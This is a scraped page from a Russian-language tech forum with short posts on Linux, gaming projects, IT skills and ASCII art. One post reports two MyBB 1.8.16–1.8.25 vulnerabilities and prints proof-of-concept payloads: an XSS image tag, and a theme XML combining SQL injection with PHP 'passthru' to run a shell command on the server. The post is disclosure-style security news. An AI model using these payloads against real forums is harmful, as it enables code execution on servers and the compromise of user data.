2 Ответы
19.03.2021 13:Mar
- AMD Ryzen 5 1500X
- Radeon RX 460, Mesa 20.3.4, amdgpu
- Fedora 33
- KDE Plasma 5.21.3
- Ядро 5.10.23
В какую сторону копать вообще? Я даже не представляю, в чём может быть причина.
В какую сторону копать вообще? Я даже не представляю, в чём может быть причина.
19.03.2021 07:Mar
В MyBB версий 1.8.16 - 1.8.25 выявлены две уязвимости.
1. Из-за ошибки в преобразователе тегов возможны двойные URL:
Что преобразуется в
2. Возможны SQL-инъекции через шаблоны оформления:
Данный шаблон выполнит
https://blog.sonarsource.com/mybb-remote...tion-chain
1. Из-за ошибки в преобразователе тегов возможны двойные URL:
Код:
[img]http://xyzsomething.com/image?)http://x.com/onerror=alert(1);//[/img]Код:
<img src="http://xyzsomething.com/image?)<a href=" http:="" x.com="" onerror="alert(1);//"" target="_blank" rel="noopener" class="mycode_url">2. Возможны SQL-инъекции через шаблоны оформления:
Код:
<?xml version="1.0" encoding="UTF-8"?>
<theme name="Default" version="1821">
<properties>
<templateset>') AND 1=0 UNION SELECT title, '${passthru(\'ls\')}' from mybb_templates -- </templateset>
</properties>
</theme>ls на сервере.https://blog.sonarsource.com/mybb-remote...tion-chain
10 Ответы
15.03.2021 21:Mar
Наткнулся на https://www.linux-live.org/
Работает это так: вы ставите дистрибутив, устанавливаете некоторые нужные пакеты (например, genisoimage), вносите изменения в систему, запускаете скрипт build, и вот готова новая лайв-система. Ещё никогда процесс создания BolgenOS не был таким простым.
Обещают поддержку любого дистрибутива, но рекомендуют Debian.
Работает это так: вы ставите дистрибутив, устанавливаете некоторые нужные пакеты (например, genisoimage), вносите изменения в систему, запускаете скрипт build, и вот готова новая лайв-система. Ещё никогда процесс создания BolgenOS не был таким простым.
Обещают поддержку любого дистрибутива, но рекомендуют Debian.
13.03.2021 15:Mar
Под ними я имею в виду те знания и навыки, которые не привязаны к какой-либо одной области деятельности. Самый очевидный из метанавыков - общение, умение понимать, чувствовать и убеждать людей, вести - в широком смысле - деловые переговоры. Он нужен почти всем: от менеджера по продаже дорогих автомобилей в автосалоне до одиночки-программиста, работающего дистанционно на фриланс.
Ниже перечислены те из них, которые я сам считаю таковыми; и лишь те из них, которые напрямую связаны с IT:
Порядок там тот, в котором я о них вспоминал. Дополните и опровергните если и чем считаете нужным.
Ниже перечислены те из них, которые я сам считаю таковыми; и лишь те из них, которые напрямую связаны с IT:
- HTML + CSS + JS
- Написание браузерных расширений - минимальное знание API Хрома и Фокса
- Регулярные выражения, в том числе знать основные отличия PCRE от яваскриптовских. - На мой взгляд, два основных стандарта де-факто
- Конвенции именования файлов
- Английский язык
- Сборка нодовских приложений и библиотек. - Под Ноду довольно много разных штук на ГитХабе, но собирать их обычно требуется самостоятельно. Ее популярность, вроде бы, не снижается
- Какой-нибудь язык для автоматизирования некоторых сценариев взаиммодействия пользователя с ОС и приложениями
- Какой-нибудь язык для быстрого написания приложений чисто для себя.
- Понимание основ баз данных. Не на уровне реального использования какой-нибудь MySQL, а хотя б чтоб было понимание, чем база данных отличается от таблички в Экселе (и в каких случаях нужна база, а в каких достаточно и таблички).
- Знание какого-нибудь человекочитаемого языка разметки для написания текстов.
Порядок там тот, в котором я о них вспоминал. Дополните и опровергните если и чем считаете нужным.
5 Ответы
12.03.2021 20:Mar
Здесь постим только арт! Сообщения без арта будут удаляться! Погнали! :3
Sony Vaio VGN-UX:
Котик! (тег code немного ломает, но это должен быть котик ☺):
Sony Vaio VGN-UX:
Код:
.
┌───────────────────────────┐
│ ─── • VAIO │
│ ┌───────────────────────┐ │
│ │ │ │
│ │ │ │
┌───┤ │ │ ├───┐
│┌─┐│ │ │ │┌─┐│
││ ││ │ │ │└─┘│
│├─┤│ └───────────────────────┘ │ │
│└─┘│ . . . . . . . │┌─┐│
│┌─┐└───────────────────────────┘└─┘│
│└─┘ ┌─┬─┬─┬─┬─┬─┬─┬─┬─┬─┬─┬─┬─┐ ┌─┐│
│ ├─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┤ └─┘│
│┌─┐ ├─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┤ │
│└─┘ ├─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┼─┤ │
├┐ ├─┼─┼─┼─┼─┼─┴─┼─┼─┼─┼─┼─┼─┤ ┌┤
├┘ └─┴─┴─┴─┴─┴───┴─┴─┴─┴─┴─┴─┘ └┤
└───────────────────────────────────┘Котик! (тег code немного ломает, но это должен быть котик ☺):
Код:
. /\_/\
.("\=^:^=/")
. \ \ / /
. | |
. | |____
. (…)_(…)____)5 Ответы
11.03.2021 21:Mar
В этом треде могут быть размещены ссылки на плагины для MyBB, которые могут оказаться полезными на нашем форуме, но в данный момент либо не востребованы, либо им не нашлось практического применения.
Пользователи могут высказываться за включение какого-либо из перечисленных плагинов и предлагать свои варианты в комментариях. Включение будет рассмотрено администраторами сервера, включенные или более не актуальные плагины будут удаляться.
Обсуждения не по теме будут удаляться.
Пользователи могут высказываться за включение какого-либо из перечисленных плагинов и предлагать свои варианты в комментариях. Включение будет рассмотрено администраторами сервера, включенные или более не актуальные плагины будут удаляться.
Обсуждения не по теме будут удаляться.
3 Ответы
11.03.2021 20:Mar
Разработчик 7-zip Игорь Павлов опубликовал консольную версию для Linux в связи с тем, что p7zip не обновлялся несколько лет. Доступные версии для x86, x86_64, ARM и ARM64. В версии для ARM64 задействованы инструкции для ускорения вычислений AES, CRC-32, SHA-1 и SHA-256.
https://sourceforge.net/p/sevenzip/discu...ec5e63147/
https://sourceforge.net/p/sevenzip/discu...ec5e63147/
3 Ответы
20.02.2021 09:Feb
Также были закрыты все репозитории с форками проекта.
re3 - проект по обратному инжинирингу игр GTA 3, GTA Vice City и GTA Liberty City Stories. Он позволял запускать эти игры на Windows, Linux, macOS, FreeBSD и некоторых консолях.
https://github.com/github/dmca/blob/mast...ake-two.md
re3 - проект по обратному инжинирингу игр GTA 3, GTA Vice City и GTA Liberty City Stories. Он позволял запускать эти игры на Windows, Linux, macOS, FreeBSD и некоторых консолях.
https://github.com/github/dmca/blob/mast...ake-two.md
19.02.2021 15:Feb
- Устранены некоторые предупреждения при сборке с помощью новых версий Meson
- Теперь в списке устройств будут появляться программные реализации Vulkan (такие, как lavapipe). Это сделано для избежания проблем на системах без дискретной видеокарты.
- Добавлена поддержка нескольких мониторов. Это требует последнюю версию Wine и XRandR 1.4.
- Оптимизированы операции с image layout. Это может увеличить производительность некоторых игр на GPU от Intel.
- В Direct3D 9 оптимизирована производительность загрузки текстур.
16.02.2021 12:Feb
Monado - открытая реализация стандарта OpenXR для VR/AR устройств. Monado 21 стал официальной реализацией платформы OpenXR 1.0. Также добавлен драйвер SteamVR, что позволяет использовать драйверы шлемов и контроллеров, созданных для Monado.
https://www.collabora.com/news-and-blog/...ation.html
https://www.collabora.com/news-and-blog/...ation.html
